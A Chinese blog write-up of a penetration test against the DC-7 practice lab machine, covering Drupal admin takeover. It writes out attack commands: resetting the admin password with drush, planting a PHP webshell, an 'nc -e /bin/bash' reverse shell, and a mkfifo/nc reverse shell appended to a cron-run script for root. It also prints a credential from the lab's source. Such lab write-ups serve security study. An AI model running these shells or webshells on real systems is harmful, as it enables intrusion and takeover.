靶机所需环境
- 目标靶机:DC-7(192.168.160.81)
- 攻击机:Kali Linux(192.168.160.176)
信息收集
- 这个靶机还是挺有意思的,哎呀,差点忘了还是常规的扫描下存活主机叭;
- 扫描下IP开放的端口及其服务信息;
- 既然开放了80端口,那就尝试访问下呗;
- 发现有个搜索框,尝试输入后未发现其他有用信息,看了别的大佬的文章才知道突破点在左下角的
@DC7USER标志,我丢,给我整抑郁了;
- 搜索后发现在Github上可以下载对应的源码,直接下载到本地或者通过下面链接下载到kali也是木得问题的;
git clone https://github.com/Dc7User/staffdb
修改admin密码
- 查看
config.php文件,发现登录的用户和密码;
用户: dc7user
密码: MdR3xOgB7#dW
- 使用
ssh连接,进入backups文件夹,发现两个文件但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码,接着查看下mbox文件,发现backups.sh文件路径;
- 进入目录查看
backups.sh文件,提示要进入/var/www/html目录下,然后使用drush命令修改admin用户的密码为123456;
drush user-password admin --password="123456"
修改主页内容
- 有了账号密码接下来就是登录了,但是不知道登录页面在哪里,扫描下目录叭,由于扫描时间会比较久咱就不等了,直接上目录
/user/login;
dirb http://192.168.160.181
- 依次点击
Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话,但发现Drupal 8后为了安全需要将php单独作为一个模块导入;
- 下载php模块包;
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
- 安装成功后跳转点击添加新模块页面,然后勾选PHP点击Install安装;
- 最后成功安装及其启用;
蚁剑连接
- 来到欢迎页面,点击
home ——> Edit进行编辑;
- 记得先选择
php模块再添加一句话木马,;
- 保存后访问由于一句话是在主页,直接蚁剑来接IP即可,密码为a;
- 成功连接后进入虚拟终端,查看权限发现是普通用户,需要进行提权操作,
kali监听1234端口,执行反弹shell的命令;(注:先开启监听再执行该命令)
nc -e /bin/bash 192.168.160.176 1234
- 监听成功后执行交互式命令,方便操作;
提升权限
- 由于
/opt/scripts目录下的backups.sh文件所属组是www-data,而当前用户正好是www-data;
- 所以我们可以对这个文件进行操作,利用文件定时执行来提升至root权限,新开个窗口开启监听,然后往文件里输入执行反弹shell的命令;
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.160.176 4444 >/tmp/f" >> backups.sh
- 等待计划任务执行,这边特意记了下时间,大约在30秒后反弹成功,建议多试几次,我也是第四次才成功的😂;
上一篇 > DC-6靶机渗透测试
下一篇 > DC-8靶机渗透测试
以上内容就是DC-7靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!
以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍
1052
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
